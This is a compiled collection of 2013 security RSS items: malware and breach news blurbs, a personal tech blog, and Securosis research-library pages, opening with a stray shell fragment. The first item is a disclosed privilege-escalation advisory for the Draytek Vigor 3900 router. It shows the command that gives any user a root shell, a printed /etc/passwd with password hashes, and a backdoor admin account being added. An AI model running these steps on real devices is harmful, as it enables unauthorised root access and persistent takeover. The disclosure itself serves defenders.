echo "Sleeping 30 secs before rebooting"
sleep 30
curl $1

==> Draytek Vigor 3900 1.06 - Privilege Escalation Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss

# Exploit Title: Privilege escalation
# Date: 19/3/2013
# Exploit Author: Mohammad abou hayt
# Vendor Homepage: http://www.draytek.com.tw/index.php?option=com_k2&view=item&layout=item&id=2627&Itemid=593&lang=en
# Software Link: N/A
# Version: Vigor 3900 -Hardware V2 - firmware latest 1.06

########################Privilege escalation for draytek vigor 3900#####################

########################Affected device Description:#####################################

Vigor 3900 Router Firewall : High Performance Multi-WAN VPN Appliance

The Vigor 3900 is a high-performance quad-Gigabit WAN router for high-performance applications including remote access, firewalling, load-balancing and failover. Its WAN throughput runs at up to 1Gb/s, adequate for the most demanding SME applications. The WAN ports on the Vigor 3900 can provide load balancing or WAN failover. Based on a new DrayTek OS platform, the Vigor 3900 combines high performance and capacity with DrayTek's traditional ease of use and comprehensive features set.

########For multi-tenant or departmental flexibility, the Vigor3900 will support multiple LAN IP subnets, together with VLAN capabilities and user management providing access to WAN resources only to the appropriate users or departments, as well as maintaining infrastructure efficiency.

############################Advisory:###################################################

#The finding started when creating a normal limited user or any user to access the firewall dashboard.

##Having the port 22 open by default, try to login the firewall using putty with this limited user credentials

login as: test
test@192.168.0.1 password:
****************************************
* *
* Welcome V3900 *
* *
****************************************
Welcome it is Thu Mar 28 18:58:31 UTC 2013
Vigor3900>

###vigor 3900 is built in BusyBox : Trying to shell the device by using “sh draytekv3900” will gain root shell without asking for credential .

####And what I have noticed that any user you create from the dashboard will be able to access the root shell whereas .

Vigor3900> sh draytekv3900
BusyBox v1.4.2 (2013-02-25 23:52:19 CST) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

#####Printing the cat /etc/passwd

~ # cat /etc/passwd
root:!:0:0:root:/tmp:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
admin:$1$1xUkNSXm$SFvMVQCzcM3LmK9mrJmux0:500:500:admin:/tmp:/usr/bin/clish
operator:$1$.FTn64sr$3tKZ2599RrSU9TA.C/vKd0:501:501:operator:/usr:/bin/clish
quagga:x:51:51:quagga:/tmp/.quagga:/bin/false
test:$1$qHVw8Ap.BnYm7jd5VYqBSo0:502:502:Linux User,,,:/tmp:/usr/bin/clish

#######Adding another admin (admin1)

~ # vi /etc/passwd
root:!:0:0:root:/tmp:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
admin:$1$1xUkNSXm$SFvMVQCzcM3LmK9mrJmux0:500:500:admin:/tmp:/usr/bin/clish
operator:$1$.FTn64sr$3tKZ2599RrSU9TA.C/vKd0:501:501:operator:/usr:/bin/clish
quagga:x:51:51:quagga:/tmp/.quagga:/bin/false
admin1:$1$1xUkNSXm$SFvMVQCzcM3LmK9mrJmux0:500:500:admin:/tmp:/usr/bin/clish
test:$1$qHVw8Ap.BnYm7jd5VYqBSo0:502:502:Linux User,,,:/tmp:/usr/bin/clish
~:wq
Discovered and written by: Mohammad Abou Hayt

==> Cybergang plans to use Trojan against U.S. banks

http://rss.techtarget.com/981.xml A cybergang in Eastern Europe revealed plans to attack U.S. banks with a Gozi-like Trojan, according to RSA.

==> Improved Shylock Trojan targets banking users

http://rss.techtarget.com/981.xml The latest variant of the banking Trojan is causing numerous problems, Symantec said.

==> Tilon financial malware targets banks via MitB attack, Trusteer finds

http://rss.techtarget.com/981.xml Tilon is related to the Silon malware detected in 2009. It uses a man-in-the-browser attack to capture form submissions and steal credentials.

==> Citadel malware toolkit going underground, says RSA

http://rss.techtarget.com/981.xml The Citadel crimeware, a toolkit giving cybercriminals sophisticated financial malware, is being taken off the market by its authors, according to experts monitoring its activity.

==> Tinba banking Trojan sniffs network traffic, steals data

http://rss.techtarget.com/981.xml Tinba is among the smallest data-stealing banking Trojans discovered in the wild, according to Danish security firm CSIS Security Group.

==> Ramnit worm variant now dangerous banking malware

http://rss.techtarget.com/981.xml The Ramnit worm now supports man-in-the-middle attacks, giving cybercriminals the ability to drain a victim's bank account.

==> SIEM vendors make the case for extending SIEM product capabilities

http://rss.techtarget.com/981.xml Advanced features can reduce the threat of wire fraud. New rule sets can be shared among banks and credit unions.

==> Possible breach of DHS employee data has an unusual twist

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 04 http://gcn.com/articles/2013/06/03/dhs-data-breach-employee-info.aspx By William Jackson GCN.com Jun 03, 2013 The Homeland Security Department has notified some employees that personally identifiable information used for security clearances and stored in a third-party database could have been exposed to unauthorized users. The notifications came after DHS was alerted to a vulnerability in the vendor software by a law enforcement...

==> iPhones can apparently be hacked with malicious charger

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 04 http://news.cnet.com/8301-13579_3-57587482-37/iphones-can-apparently-be-hacked-with-malicious-charger/ By Dara Kerr CNET News June 3, 2013 Most people have heard of malicious software as a way to hack into an iPhone, but what about a malicious charger? Three researchers with the Georgia Institute of Technology, say they have come up with a proof-of-concept malicious iPhone charger that lets them hack into the mobile device running the...

==> Oracle Promises Enterprise Java Security Tweaks

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 04 http://www.informationweek.com/security/application-security/oracle-promises-enterprise-java-security/240155912 By Mathew J. Schwartz InformationWeek.com June 03, 2013 Java security memo to enterprise IT managers: Better distributed client control capabilities, locked down Java servers and certificate-based controls are coming. Those three upcoming Java security changes were outlined in "Maintaining the security-worthiness of Java is...

==> U.S. publishes details of missile base Israel wanted kept secret

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 04 http://www.mcclatchydc.com/2013/06/03/192895/us-publishes-details-of-missile.html By Sheera Frenkel McClatchy Foreign Staff June 3, 2013 TEL AVIV, Israel -- Israel's military fumed Monday over the discovery that the U.S. government had revealed details of a top-secret Israeli military installation in published bid requests. The Obama administration had promised to build Israel a state-of-the-art facility to house a new ballistic-missile...

==> Army releases new leaders' handbook on cybersecurity

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 04 http://www.army.mil/article/103799/Army_releases_new_leaders__handbook_on_cybersecurity/ By Army CIO/G-6 June 3, 2013 WASHINGTON (June 3, 2013) -- The Army published a new handbook this month to provide leaders of all levels with the information and tools needed to address today's cybersecurity challenges, and to ensure organizations adopt the necessary practices to protect their information and the Army network. "We must change...

==> ASIO hacking failed, officials say

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 03 http://www.canberratimes.com.au/it-pro/security-it/asio-hacking-failed-officials-say-20130531-2nhgk.html By Philip Dorling The Canberra Times June 1, 2013 Australian national security officials have denied classified plans of ASIO's new headquarters building were stolen by Chinese hackers and say the opposition was informed of this in a security briefing. According to security officials, there were attempted cyber intrusions against...

==> Lawmakers press Obama to get tough with China on cyber espionage

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 03 http://thehill.com/blogs/hillicon-valley/technology/302885-lawmakers-to-obama-get-tough-with-china-on-hacking By Jennifer Martinez Hillicon Valley 06/02/13 Congressional pressure is mounting for President Obama to talk tough this week to his Chinese counterpart Xi Jinping on cybersecurity. House Intelligence Chairman Mike Rogers (R-Mich.) is calling on Obama to explicitly warn the Chinese president that cyberattacks waged by the...

==> Hacking The TDoS Attack

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 03 http://www.darkreading.com/attacks-breaches/hacking-the-tdos-attack/240155809 By Kelly Jackson Higgins Dark Reading May 30, 2013 When an ICU nurse refused to pay scammers who insisted she owed money for a payday loan, they unleashed a robo-dial flood of hundreds of calls per hour that ultimately shut down the phone system of the hospital's intensive care unit. In another case, supporters of a popular company that received a negative...

==> E-vil empire: USSR's old domain space is increasingly attractive hideout for hackers

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 03 http://www.canada.com/entertainment/Evil+empire+USSRs+domain+space+increasingly+attractive+hideout/8459435/story.html BY RAPHAEL SATTER THE ASSOCIATED PRESS MAY 31, 2013 MOSCOW - The Soviet Union disappeared from the map more than two decades ago. But online an 'e-vil empire' is thriving. Security experts say the .su Internet suffix assigned to the USSR in 1990 has turned into a haven for hackers who've flocked to the defunct...

==> NATO's Next War -- in Cyberspace

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 03 http://online.wsj.com/article/SB10001424127887323855804578508894129031084.html By ANDERS FOGH RASMUSSEN The Wall Street Journal June 2, 2013 On April 23, the Dow Jones Industrial Average dropped by 150 points within seven minutes, destroying billions of dollars in value. The reason was a message on the Associated Press's Twitter account claiming that two explosions had shaken the White House. The tweet was quickly exposed as bogus, the...

==> Indonesia to create its own "cyber army"

http://seclists.org/rss/isn.rss Posted by InfoSec News on May 30 http://news.xinhuanet.com/english/world/2013-05/29/c_132416837.htm By Abu Hanifah English.news.cn 2013-05-29 JAKARTA, May 29 (Xinhua) -- In a move to keep the country's sovereignty in the cyber age, the Indonesian defense ministry is planning to create a special force called "cyber army" to tackle attacks by Internet hackers against the state's Internet portals and websites that could endanger the security of the state....

==> Hackers exploit Ruby on Rails vulnerability to compromise servers, create botnet

http://seclists.org/rss/isn.rss Posted by InfoSec News on May 30 http://news.techworld.com/applications/3449583/hackers-exploit-ruby-on-rails-vulnerability-to-compromise-servers-create-botnet/ By Lucian Constantin Techworld.com 29 May 2013 Hackers are actively exploiting a critical vulnerability in the Ruby on Rails Web application development framework in order to compromise Web servers and create a botnet. The Ruby on Rails development team released a security patch for the vulnerability, which is...

==> NYPD cop arrested, accused of paying $4,000 to hack fellow officers’ e-mail

http://seclists.org/rss/isn.rss Posted by InfoSec News on May 30 http://arstechnica.com/tech-policy/2013/05/nypd-cop-arrested-accused-of-paying-4000-to-hack-fellow-officers-e-mail/ By Cyrus Farivar Ars Technica May 29 2013 It's no surprise that many computer crimes have stupid criminals behind them. But it's not every day that you have cops getting caught at their workplace. A New York City Police Department (NYPD) officer has been arrested and accused of paying more than $4,000 via Paypal for...

==> Drupal resets account passwords after detecting unauthorized access

http://seclists.org/rss/isn.rss Posted by InfoSec News on May 30 https://www.computerworld.com/s/article/9239613/Drupal_resets_account_passwords_after_detecting_unauthorized_access By John Ribeiro IDG News Service May 29, 2013 Drupal.org has reset account passwords after it found unauthorized access to information on its servers. The access came through third-party software installed on the Drupal.org server infrastructure, and was not the result of a vulnerability within Drupal, the open source content...

==> Liberty Reserve arrests are causing 'pain' to criminals

http://seclists.org/rss/isn.rss Posted by InfoSec News on May 30 http://www.bbc.co.uk/news/technology-22699871 By Leo Kelion Technology reporter BBC News 29 May 2013 The takedown of the Liberty Reserve digital cash exchange has caused "pain" to criminals who used the facility, according to a leading security expert. Brian Krebs said he had seen comments on crime-linked restricted access forums suggesting many had suffered "steep losses". US prosecutors published an indictment against...

==> Cyber Security Awareness Month

http://securitysumo.wordpress.com/feed/ The Internet Storm Center is offering daily tips on cyber-security, and specifically on incident handling, for the month of October. Check out the link to catch up on the daily tips or submit your own. Posted in Internet Security

==> Apple OS X Root Privilege Vulnerability

http://securitysumo.wordpress.com/feed/ If you are a Mac user, and haven’t seen the latest security vulnerability for OS X yet, Macshadows has an excellent writeup, with a temporary solution. Essentially, you need to open a terminal window and paste the following command: sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent After you press return, you will be prompted for your password. This [...]

==> Portable and Cross-platform Personal Password Manager

http://securitysumo.wordpress.com/feed/ Having to change between two different platforms (Windows and OS X), I wanted a functional password manager that was both portable and cross-platform. KeePass fits this requirement, and even has a Linux port and several other versions, as well. KeePass is open source and free. Download the portable apps version of KeePass here, and the [...]

==> Revision3 Denial of Service Attack

http://securitysumo.wordpress.com/feed/ Revision3 spent the Memorial Day weekend fighting off a denial of service attack. Their blog post summarizes the shocking and angering results. Check it out.

==> I Will Derive …

http://securitysumo.wordpress.com/feed/ One of the funniest videos I have seen in a while (at least from my totally nerd viewpoint):

==> MacBook Pro Hard Drive Replacement

http://securitysumo.wordpress.com/feed/ I upgraded the hard drive in my MacBook Pro today. It went pretty well, but is not really for the easily technological-intimidated! I followed (for the most part) the guide at ifixit. I ran into a few things that their guide didn’t include, so I thought I would add my experience here. First, as you [...]

==> MacBook and MacBook Pro USB Ports

http://securitysumo.wordpress.com/feed/ This week on MacBreak Weekly (Episode 88) one of the hosts was having sound problems with a USB headset. They discussed the problem and one of the other hosts suggested changing the port the headset is on. A short discussion followed and here are the results. The MacBook has two USB ports on [...]

==> VMWare Fusion 2 Beta and Backtrack Wireless

http://securitysumo.wordpress.com/feed/ If you are trying to use VMWare Fusion 2.0 Beta and anything wireless in Backtrack, you might want to wait until the next release. I had all different kinds of trouble getting wireless USB dongles working with the setup. First Kismet would quit because of a TCP error. Then I had several kernel panics. Going [...]

==> What’s on my USB key?

http://securitysumo.wordpress.com/feed/ I’ve gathered many programs for my USB memory stick so I thought I would list them here. Actually, when you get down to it, I have a couple of memory sticks I keep with me most of the time. The first one is an older stick and is only 256 MB. However, it has a [...]

==> Ubuntu 8.04, VMWare Server, Wine and Warcraft, DVD Playback

http://securitysumo.wordpress.com/feed/ I installed the latest Ubuntu (8.04) last weekend and have been playing around with it a bit this week. Wow, is it nice! It is noticeably quicker than my 7.10 install. Of course, I did a complete wipe and reinstall, so that probably has something to do with the speed. I installed VMWare Server as [...]

==> Data Security

http://securosis.com/feeds/research If you really think about it, technically all of “information security” is “data security”, but the reality is that most of our industry is focused on protecting networks and hosts, and very little is dedicated to protecting the information assets themselves. We here at Securosis prefer the term “Information-Centric Security”, since information is data with value (as opposed to just a bunch of 0’s and 1’s), but we know “data security” is more commonly used, and we’re not about to fight the industry.

Since data security encompasses a wide range of tools, technologies, and processes we will highlight top-level management issues on this page, and encourage you to explore the subtopics for more details on database security, DLP, encryption, and other specific areas.

We keep all of our Research Library pages updated with our latest research. Content is added where it fits best, not in chronological order, so we mark new material with the month/year it’s added to help you find changes more easily.

Papers and Posts
------------
If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments).

1. The most important piece of work we’ve published on data security is the following: The Business Justification for Data Security. We recommend you download the white paper as it provides a condensed (and professionally edited) review, and here are the links to the individual blog posts to add additional color and commentary: Part 1, part 2, part 3, part 4, part 5, and part 6. (03/09).
2. Tokenization vs. Encryption: Options for compliance. This paper outlines the business uses for tokenization, and examines the tradeoffs between tokenization and traditional encryption.
3. Next, you should read our series of posts on the Data Security Lifecycle which shows how all the various bits and pieces plug in together. Keep in mind that some of these technologies aren’t completely available yet, but the series should give you a good overview of how to take a big picture approach to data security. Start with the Lifecycle, then read the details on the technologies, organized by phase: Part 1, Part 2, Part 3.
4. The general principles of Information-centric/Data Security.
5. Data Verification Issues.
6. Data And Application Security Will Drive Most Security Growth For The Next 3-5 Years.
7. Defensive Security Stack; showing where data security fits in with network, host, and application security (I mention CMF, which is the same as DLP): Data Protection - it’s More than A + B + C.
8. We believe that two existing technologies are evolving into the “core” of data security: Data Loss Prevention and Database Activity Monitoring. They are evolving into what we call Content Monitoring and Protection (DLP, for protecting productivity applications and communications), and Application and Database Monitoring and Protection (DAM, for protecting applications and the data center). We define both technologies in Definitions: Content Monitoring and Protection And Application and Database Monitoring and Protection.
9. Continuation of Content Monitoring and Protection: How Data Loss Prevention and Database Activity Monitoring Will Connect.
10. Data classification comes up all the time when discussing data security. Here’s an overview that starts to introduce the idea of practical data classification: The Five Problems With Data Classification, an Introduction To Practical Data Classification. We followed it with a post: Practical Data Classification: Type 1, The Hasty Classification. But the truth is, classification is usually quite problematic, and we don’t recommend manual classification to most enterprise users, as we wrote in: Data Classification is Dead. (We haven’t finished our data classification series yet).
11. Related to data classification, here is a post on Information Governance.
12. Before you start digging in too deep on data security, we recommend you prepare by understanding your users and infrastructure, as we wrote in: Information-Centric Security Tip: Know Your Users and Infrastructure.
13. File Activity Monitoring is an exciting new technology that finally gives us insight into not only how our files are used, but who the heck is accessing them, should be accessing them, and when they violate security policies. We can finally do things like generate alerts when a sales guy starts sucking down all the customer files before moving to a competitor.

General Coverage
------------
1. Sorry, Data Labeling is Not the Same as DRM/ERM
2. Data Labels Suck.
3. Security Requirements for Electronic Medical Records.
4. The Data Breach Triangle.
5. Data Harvesting and Privacy.

Presentations
---------
These PDF versions of presentations may also be useful, although they don’t include any audio (for any audio/video, please see the next section).

* This is the Business Justification for Data Security Presentation that Rich and Adrian provided in February 2009.
* This presentation is on Mobile Data Security for the Enterprise.
* Our presentation on Information Centric Data Security and the Data Centric Security Lifecycle.
* Here’s the current version of Pragmatic Data Security which provides a good, practical process overview with specific implementation details.
* Presentation on Data Protection in the Enterprise. Kind of a corporate overview.
* Presentation on XML Security.

Podcasts, Webcasts and Multimedia
---------
We do not currently have any multimedia for this topic.

Vendors/Tools
---------
The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections.

Since data security is such a broad issue, please see the sub-categories for vendors and tools. If much of this material seems somewhat generic, that’s because data/information-centric security is a fairly high-level topic. We really encourage you to learn about the specifics in the sub-categories in the navigation menu.

==> Upcoming Research

http://securosis.com/feeds/research The Securosis Research Agenda is a dynamic entity. We are constantly revisiting our research plans, so check back often to see what’s in the hopper:

* Understanding and Selecting a Web Application Firewall
* SIEM 2.0: Replacing Your SIEM Solution
* Securing Applications at Scale
* Masking for Compliance
* Code Security: Security for Developers
* Pragmatic Data Security
* Network Security Fundamentals
* Endpoint Security Fundamentals
* Database Security 2.0: Database Security for Relational and Non-relational Systems
* Understanding and Implementing Network Segregation
* Data Security for the Cloud

Some of these papers will be sponsored, some won’t, but all will be released for free under a Creative Commons license on our blog and within the Research Library.

==> All Research Papers

http://securosis.com/feeds/research Application Security Securing Big Data: Recommendations for Securing Hadoop and NoSQL Pragmatic WAF Management: Giving Web Apps a Fighting Chance Building a Web Application Security Program Cloud and Virtualization Compliance Tokenization Guidance Tokenization vs. Encryption: Options for Compliance Data Encryption 101: A Pragmatic Approach to PCI Data Security Understanding and Selecting a Key Management Solution Pragmatic Key Management for Data Encryption Understanding and Selecting Data Masking Solutions Implementing and Managing a Data Loss Prevention Solution Defending Data on iOS Understanding and Selecting a Database Security Platform Understanding and Selecting a File Activity Monitoring Solution Database Activity Monitoring: Software vs. Appliance The Securosis 2010 Data Security Survey Understanding and Selecting a Tokenization Solution Understanding and Selecting a DLP Solution Understanding and Selecting a Database Encryption or Tokenization Solution Low Hanging Fruit: Quick Wins with Data Loss Prevention (V2.0) Database Assessment Content Discovery Whitepaper Selecting a Database Activity Monitoring Solution Endpoint Security The Endpoint Security Management Buyer’s Guide Endpoint Security Fundamentals Best Practices for Endpoint DLP Evolving Endpoint Malware Detection: Dealing with Advanced and Targeted Attacks Network Security Network-based Threat Intelligence: Searching for the Smoking Gun Defending Against Denial of Service (DoS) Attacks Network-based Malware Detection: Filling the Gaps of AV Applied Network Security Analysis: Moving from Data to Information Fact-Based Network Security: Metrics and the Pursuit of Prioritization Network Security in the Age of Any Computing Understanding and Selecting an Enterprise Firewall Project Quant Malware Analysis Quant Measuring and Optimizing Database Security Operations (DBQuant) Network Security Ops Quant Metrics Model Network Security Operations Quant Report Project 
Quant Survey Results and Analysis Project Quant Metrics Model Report Security Management Building an Early Warning System Implementing and Managing Patch and Configuration Management Vulnerability Management Evolution: From Tactical Scanner to Strategic Platform Watching the Watchers: Guarding the Keys to the Kingdom (Privileged User Management) Security Management 2.0: Time to Replace Your SIEM? Security Benchmarking: Going Beyond Metrics React Faster and Better: New Approaches for Advanced Incident Response Monitoring up the Stack: Adding Value to SIEM Understanding and Selecting SIEM/Log Management The Business Justification for Data Security Web and Email Security Email-based Threat Intelligence: To Catch a Phish

==> Vendor List

http://securosis.com/feeds/research Company Name Exhibitor Type Booth Number Sub-category Category Website 3M Mobile Interactive Solutions Division Exhibitor 2740 Mobile Security Endpoint Security http://solutions.3m.com/wps/portal/3M/en_US/Meetings/Home/ ActivIdentity Exhibitor 1128 Authentication Identity and Access Management http://www.actividentity.com/ Advanced Product Design Exhibitor 340 Advantech Exhibitor 217 AFC Industries Exhibitor 235 Furniture Other http://www.afcindustries.com/ Agiliance Exhibitor 2351 Compliance Security Management and Compliance http://www.agiliance.com/ Akamai Technologies Silver Sponsor 2017 Content Delivery http://www.akamai.com Alert Enterprise Exhibitor 351 Compliance Security Management and Compliance http://www.alertenterprise.com/ Alert Logic Exhibitor 2529 IDS/IPS Network Security http://www.alertlogic.com/ AlgoSec Exhibitor 856 Firewalls Network Security http://www.algosec.com/en/index.php AlienVault Exhibitor 652 SIEM/Log Management Security Management and Compliance http://www.alienvault.com/ Alta Associates Inc. Exhibitor 850 Compliance Security Management and Compliance http://www.altaassociates.com/ AMAX Information Technologies Exhibitor 346 http://www.amaxit.com/ American Portwell Technology, Inc. Exhibitor 628 http://www.portwell.com/ Anakam, an Equifax Company Exhibitor 226 Authentication Identity and Access Management http://www.anakam.com/ Anne Arundel Community College Exhibitor 2728 Education Other http://www.aacc.edu/ Anonymizer, Inc. Exhibitor 2722 Content Security Network Security http://www.anonymizer.com/ Antiy Labs Partner Pavilion 1541 Endpoint Security http://www.antiy.net/ Anue Systems Inc. Exhibitor 2445 Application Testing Application Security http://www.anuesystems.com/ APCON Exhibitor 832 http://www.apcon.com/ Application Security, Inc. 
Exhibitor 639 Database Security, Vulnerability Assessment Data Security, Security Management and Compliance http://www.appsecinc.com/ AppRiver Exhibitor 1059 Managed Services Email/Web Security http://www.appriver.com/ Approva Exhibitor 428 Compliance Security Management and Compliance http://www.approva.net/ Araknos SRL Unipersonale Exhibitor 347 SIEM/Log Management Security Management and Compliance http://www.araknos.it/en/azienda/azienda.html ArcSight Exhibitor 931 SIEM/Log Management Security Management and Compliance http://www.arcsight.com/ Armorize Technologies Inc. Exhibitor 329 Web Application Assessment Application Security http://www.armorize.com/ Art of Defence GmbH Partner Pavilion 1350 http://www.artofdefence.com/ Art of Defence GmbH Exhibitor 342 Web App Firewalls Application Security http://www.artofdefence.com/ Arxan Technologies Exhibitor 328 Secure Development Application Security http://www.arxan.com/ Astaro Exhibitor 2251 Firewalls, Email Security Gateway, Web Security Gateway Network Security, Email/Web Security http://www.astaro.com/ AT&T Exhibitor 831 http://www.att.com/ atsec information security Partner Pavilion 1350 Compliance Security Management and Compliance http://www.atsec.com/ Authentify, Inc. Exhibitor 1029 Authentication Identity and Access Management http://www.authentify.com/ Authernative, Inc. Exhibitor 550 Authentication Identity and Access Management http://www.authernative.com/ Avenda Systems Exhibitor 318 NAC Network Security http://www.avendasys.com/ Axway Silver Sponsor 2225 http://www.axway.com/ BeCrypt Inc. Exhibitor 2129 Disk Encryption Endpoint Security http://www.becrypt.com/ Beijing LinkTrust Technologies Development Co.,Ltd. Partner Pavilion 1541 Perimeter Defense Network Security http://www.linktrust.com.cn/ Beijing Topsec Science and Technology Co.,Ltd Partner Pavilion 1541 Beijing Venustech Inc. 
Partner Pavilion 1541 Perimeter Defense Network Security http://english.venustech.com.cn/ Beijing Zhongguancun Overseas Science Park Exhibitor 1541 http://www.zgc.gov.cn/english/ BeyondTrust Corp. Exhibitor 945 Anti-Malware Endpoint Security http://www.beyondtrust.com/ Bit9, Inc. Exhibitor 2621 Anti-Malware Endpoint Security http://www.bit9.com/ Bivio Networks Exhibitor 2133 Content Security Network Security http://www.bivio.net/ Black Box Network Services Exhibitor 2550 http://www.blackbox.com/ BlockMaster AB Exhibitor 2425 Mobile Security Endpoint Security http://www.blockmastersecurity.com/ Blue Coat Systems, Inc. Gold Sponsor 1139 Threat Mgmt, Anti-Malware, Web Security Gateway Network Security, Email/Web Security http://www.bluecoat.com/ BluePoint Security Exhibitor 2559 Cloud Security Virtualization and Cloud http://www.bluepointsecurity.com/ Brainloop Inc. Partner Pavilion 1350 Access Management Data Security http://www.brainloop.com/ BreakingPoint Systems, Inc. Exhibitor 951 Monitoring Network Security http://www.breakingpointsystems.com/ BroadWeb Corporation Partner Pavilion 1541 Perimeter Defense Network Security http://www.broadweb.com/ Bsafe Information Systems Inc. Exhibitor 855 Compliance Security Management and Compliance http://www.bsafesolutions.com/ BSI Partner Pavilion 1344 http://www.bsigroup.com/ C4ISR Journal Exhibitor 2650 Publication Other http://www.c4isrjournal.com CA Technologies Platinum Sponsor 1533 DLP, SIEM/Log Management, Compliance Data Security, Security Management and Compliance http://ca.com/ Capella University Exhibitor 251 Education Other http://www.capella.edu/ Cavium Networks Exhibitor 528 http://www.caviumnetworks.com/ Hardware CCSO.com Exhibitor 2619 http://www.ccso.com/ Disassembler Celestix Networks Exhibitor 852 Perimeter Defense Network Security http://www.celestix.com/ Cenzic, Inc. 
Exhibitor 332 Application Testing, Application Assessment Application Security http://www.cenzic.com/ Check Point Software Technologies Exhibitor 2317 Firewalls, IDS/IPS, Remote Access, Disk Encryption Network Security, Endpoint Security http://www.checkpoint.com/ Cherry Exhibitor 755 http://www.cherrycorp.com/ Hardware China quality certification certificate authority Partner Pavilion 1541 Compliance Security Management and Compliance http://www.cqc.com.cn/english/ CipherOptics Exhibitor 1923 Encryption Data Security http://www.cipheroptics.com/ Cisco Global Platinum Sponsor 1717 Firewalls, Remote Access, Threat Mgmt, Email Security Gateway, Web Security Gateway, Managed Services Network Security, Email/Web Security http://www.cisco.com/ Cloud Security Alliance Exhibitor 2718 http://www.cloudsecurityalliance.org/ Comodo Group, Inc. Exhibitor 2439 Endpoint Defense Endpoint Security http://www.comodo.com/ CoreTrace Corporation Exhibitor 1963 Anti-Malware Endpoint Security http://www.coretrace.com/ CORISECIO GmbH Partner Pavilion 1350 http://www.corisecio.com/ Coverity Exhibitor 333 Secure Development Application Security http://www.coverity.com/ Critical Watch Exhibitor 950 Compliance Security Management and Compliance http://www.criticalwatch.com/ Cryptography Research, Inc. Exhibitor 2233 http://www.cryptography.com/ Secure dev hardware cv cryptovision GmbH Partner Pavilion 1350 Encryption Data Security http://www.cryptovision.com/ Cyber-Ark Software, Inc. Exhibitor 2045 Authentication Identity and Access Management http://www.cyber-ark.com/ Cybera Exhibitor 752 Compliance Security Management and Compliance http://www.cybera.com/ Cyberoam Exhibitor 723 Perimeter Defense Network Security http://www.cyberoam.com/ Damballa Exhibitor 433 Endpoint Defense Endpoint Security http://www.damballa.com/ Dasient, Inc. Exhibitor 554 Endpoint Defense Endpoint Security http://www.dasient.com/ Dataguise Inc. 
Exhibitor 645 Database Security Data Security http://www.dataguise.com/ Department of Homeland Security/ US-CERT Exhibitor 457 http://www.us-cert.gov/ DeviceLock Exhibitor 2228 Mobile Security

==> Welcome to Securosis Research

http://securosis.com/feeds/research About Our Research -------------- Securosis is a new breed of IT research firm focusing on the broad information security and compliance markets. As opposed to relying on big sales forces and high pay walls, we publish our primary research for free on our blog. Yeah, we know, it’s different and scary. But it works. In terms of our primary research model, our focus is to help mid-market IT and security professionals successfully execute on their projects, by providing actionable information to accelerate their progress. It doesn’t mean our research isn’t relevant to large enterprises and government agencies. It just means our primary constituency is someone who wears a security hat as well as a number of other hats on a daily basis. Each week, Securosis publishes a ton of research on what’s happening in the security business, all focused on keeping our readers connected and focused on what’s important, not on the noise. Our weekly research includes: * Securosis FireStarter: Periodically Securosis holds an internal, no-holds-barred research meeting. Each analyst prepares a topic and the other analysts typically rip it to shreds. The end result is a thought generator that challenges our perspectives and demands further discussion. We publish the findings of that research to “stir the pot” a bit and get the echo chamber vibrating. * Securosis Incite: Something we’ve adopted from Security Incite is a hard-hitting summary of the news happening in our industry. Each Wednesday we send out 7-8 links with analysis of what’s happening out there and why it’s important. * Securosis Weekly Summary: Just in case you don’t have anything better to do over the weekend, on Friday we send out a list of things we’ve posted on the blog and also each analyst’s favorite outside post. This keeps you up to date on what we’ve been up to. 
* Ad Hoc Posts: Yes, the art of blogging is far from dead. During the week, once or twice a day we post something of interest. It could be a more detailed treatment of an announcement, something that’s been bothering us, or part of our primary research (which is always posted to the blog first). In case you are some kind of dinosaur and don’t use an RSS reader, you can sign up for email distribution of our blog posts. Sign up for the Daily Digest or the Weekly Summary.
For each of our coverage areas, we have a defined hierarchy of primary research documents we prepare to ensure deep coverage and actionable advice: * Understanding and Selecting: This series of posts provides the backdrop for each security domain. The research takes a product category perspective and helps readers understand why and how they’d use certain technology, and what is important when evaluating products and offerings. As an example, check out our work on Understanding and Selecting a Database Activity Monitoring Solution. * Building a [Topic] Program: The next level in our research is how to structure a security program to solve a specific problem. This is about more than just figuring out what product to buy, but the underlying processes and techniques required to address a specific problem. You can see our Building a Web Application Security Program for an example of this research. * Project Quant: For a select few coverage areas, we go very deep and actually define very granular process maps and establish metrics to quantify those processes for an aspect of security. We do a public survey to make sure we nail the process map and publish the survey results when we get a statistically significant sample. Check out Project Quant for Patch Management to understand this research.
About the Research Library
Are you tired of having to hunt through screen after screen of crappy search results just to find the few bits of information you need? Or trawl through endless forums and unrelated blog entries just to educate yourself on a new topic? We are too… that’s why we created the Securosis Research Library. The Library is designed to be your first stop when researching a new topic. We’ve collected our best blog posts, white papers, and multimedia materials together in a structure designed to help you find what you need as quickly as possible. Unlike search results or a wiki, we’ve organized the material for each topic in the order we think it will be most useful, rather than by date or some other arbitrary sorting method. We don’t cover every security topic you could think of, but we’re constantly expanding into new areas and filling in coverage that’s lighter than we’d like. Where possible, for technology-related topics we include a list of Free/Open Source and commercial products. We try to keep these lists updated, but if you see something we are missing please email us so we can add it. This is just a list of what’s available in alphabetical order – we aren’t endorsing any particular products. We update the material in the Library on an ongoing basis, and each entry is dated with the last update. If you’d like to keep your own copy, just subscribe to the RSS feed. Since we update the date on each entry when we make changes, your RSS reader should keep a current, local copy of the entire library. Pretty cool, eh? We hope you find it useful, and please email us with any suggestions, errors, or omissions.

==> Endpoint Security

http://securosis.com/feeds/research Stand by for our endpoint security page.

==> Security Management

